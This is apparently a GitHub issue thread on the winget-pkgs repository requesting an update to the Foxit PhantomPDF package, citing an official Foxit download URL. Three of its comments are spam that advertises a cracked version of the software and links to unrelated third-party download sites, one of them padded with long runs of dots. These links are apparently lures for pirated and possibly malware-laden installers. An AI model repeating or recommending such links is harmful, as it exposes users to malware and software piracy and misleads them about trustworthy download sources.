### ISSUE TITLE
[Update Request]: New version: Foxit.PhantomPDF version 13.1.2.22442

### ISSUE THREAD

**Issue by DavidAUM23** [microsoft/winget-pkgs#155466]
### What type of update are you requesting?

A new version of an existing package

### Current Package Identifier

Foxit.PhantomPDF

### Package Version

13.1.2.22442

### Please describe the changes you would like to see

There is a new release (13.1.2) available.
Download page Url: https://cdn01.foxitsoftware.com/product/phantomPDF/desktop/win/13.1.2/FoxitPDFEditor1312_L10N_Setup.exe

**Comment by baigmirza09** [comment]
# [Download Foxit PhantomPDF Crack Version 🔽💹⏬](https://corlubar.com/dl/)

**Comment by mcmccncnbvcsfgs** [comment]
Download link Here 😍✅ https://spaxmedia.net/download/

Download Now 👉👉 https://spaxmedia.net/download/

.

.
.
.
.

.
.
.
.

.
.

.

.
.
.

..

.
.
.

.
.

.




.
.
..

.
.
.
.
.

.
.
..
.
.
.

.

.
.
.
.

.
.
.

..


.

.
.
.

.
.
.
.

.
.
.
.

.
.
.
.
.

.

**Comment by aea2927** [comment]
# **[Click HERE to Download](https://downloadsme.org/?v=232&s)**
